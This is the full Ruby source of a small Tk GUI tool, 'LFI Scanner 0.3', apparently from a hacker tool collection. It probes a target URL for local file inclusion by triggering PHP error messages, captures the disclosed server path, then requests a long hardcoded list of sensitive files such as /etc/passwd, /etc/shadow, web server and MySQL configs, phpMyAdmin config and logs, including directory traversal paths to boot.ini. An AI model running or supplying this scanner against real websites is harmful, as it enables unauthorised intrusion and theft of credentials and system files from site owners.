LFI Scanner 0.3 (Tk)

1. #!usr/bin/ruby
2. #LFI Scanner 0.3
3. #(C) Doddy Hackman 2015
4.  
5. require "tk"
6. require "net/http"
7. require "open-uri"
8.  
9. # Functions
10.  
11. def toma(web)
12.     begin
13.         return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
14.     rescue
15.         return "Error"
16.     end
17. end
18.  
19. #
20.  
21. window = TkRoot.new { title "LFI Scanner 0.3 (C) Doddy Hackman 2015" ; background "black" }
22. window['geometry'] = '300x300-20+10'
23.  
24. TkLabel.new(window) do
25.     background "black"
26.     foreground "cyan"
27.     text "    Target : "
28.     place('relx'=>"0.1",'rely'=>"0.1")
29. end
30.  
31. web= TkEntry.new(window){
32.     background "black"
33.     foreground "cyan"
34.     width 25
35.     place('relx'=>0.3,'rely'=>0.1)
36. }
37.  
38. TkLabel.new(window) do
39.     background "black"
40.     foreground "cyan"
41.     text "Console"
42.     place('relx'=>0.4,'rely'=>0.2)
43. end
44.  
45. console =TkText.new(window) do
46.     background "black"
47.     foreground "cyan"
48.     width 30
49.     height 10
50.     place('relx'=>0.1,'rely'=>0.3)
51. end
52.  
53. TkButton.new(window) do
54.     text "Search"
55.     background "black"
56.     foreground "cyan"
57.     width 17
58.     activebackground "cyan"
59.     highlightbackground  "cyan"
60.     command proc{
61.         web = web.value.to_s
62.         files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
63.         console.insert("end", "[+] Testing the vulnerability LFI...\n\n")
64.         code = toma(web+"'")
65.         if code=~/No such file or directory in <b>(.*)<\/b> on line/
66.             fpd = $1
67.             console.insert("end","[+] LFI Detected\n\n")
68.             console.insert("end","[Full Path Discloure]: "+fpd+"\n")
69.             console.insert("end","\n[+] Fuzzing Files\n\n")
70.             files.each do |file|
71.             code = toma(web+file)
72.             if not code=~/No such file or directory in/
73.                 console.insert("end","[Link] : "+web+file+"\n")
74.             end
75.         end
76.         console.insert("end","\n[+] Finish")
77.         else
78.             console.insert("end","[-] Not Vulnerable to LFI")
79.         end
80.     }
81.     place('relx'=>0.3,'rely'=>0.9)
82. end
83.  
84. Tk.mainloop
85.  
86. #The End ?